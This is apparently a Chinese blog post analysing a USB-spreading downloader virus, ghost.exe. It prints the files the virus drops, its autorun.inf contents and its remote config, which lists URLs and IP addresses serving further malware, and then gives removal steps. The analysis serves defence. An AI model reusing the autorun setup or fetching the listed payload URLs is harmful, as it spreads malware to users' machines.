今天吃饭前..接到某位mm 求助..说电脑又中毒了..
按照习惯先叫他扫个SREng 的 log 看看..意外的发现了个 ghost.exe 和四五个小病毒..
就跟她拿了 ghost.exe 看看.. 又是一个 U 盘病毒 还会下载病毒..
现在写一点点的小分析 ..目前瑞星不报..在线扫了扫发现就几家报了..
运行ghost.exe 后..
生成
ghost.exe.bat(删除自身)
C:WINDOWSsystemconime.exe
C:Program FilesWinRARWinRAR.exe.tmp
每个盘符下释放(c d e f g h j k )
autorun.inf
ghost.exe
autorun.inf 文件内容
[AutoRun]
OPEN=ghost.exe
shellexecute=ghost.exe
shell打开(&O)command=ghost.exe
连入 http://www.dj916.com/ie.txt 下载..
ie.txt 内容
[main]
服务文件更新=5
服务文件地址=http://www.86dy.net/c123.exe
下载者是否更新=4
下载个数=7
文件1=http://222.220.16.185/data6/jwm.exe
更新1=6
文件2=http://222.220.16.185/data6/wol.exe
更新2=6
文件3=http://222.220.16.185/data6/wo3.exe
更新3=6
文件4=http://222.220.16.185/data6/mir.exe
更新4=6
文件5=http://222.220.16.185/data6/mhh.exe
更新5=6
文件6=http://222.220.16.181/ienet.exe
更新6=6
文件7=http://222.220.16.185/data6/zt3.exe
更新7=6
这些网址都是下载下来的病毒..
没写入注册表..
但是我用反汇编看了看..
这玩意应该修改了
讯雷 QQ WINRAR 的注册表 ..
处理方法(不包括下载下来的病毒)
右键=>打开进入每个盘符=>删除
autorun.inf
ghost.exe
删除文件
C:WINDOWSsystemconime.exe
建议重装 qq 讯雷 WINRAR
版权与免责声明
1、本站所发布的文章仅供技术交流参考,本站不主张将其做为决策的依据,浏览者可自愿选择采信与否,本站不对因采信这些信息所产生的任何问题负责。
2、本站部分文章来源于网络,其版权为原权利人所有。由于来源之故,有的文章未能获得作者姓名,署“未知”或“佚名”。对于这些文章,有知悉作者姓名的请告知本站,以便及时署名。如果作者要求删除,我们将予以删除。除此之外本站不再承担其它责任。
3、本站部分文章来源于本站原创,本站拥有所有权利。
4、如对本站发布的信息有异议,请联系我们,经本站确认后,将在三个工作日内做出修改或删除处理。
请参阅权责声明!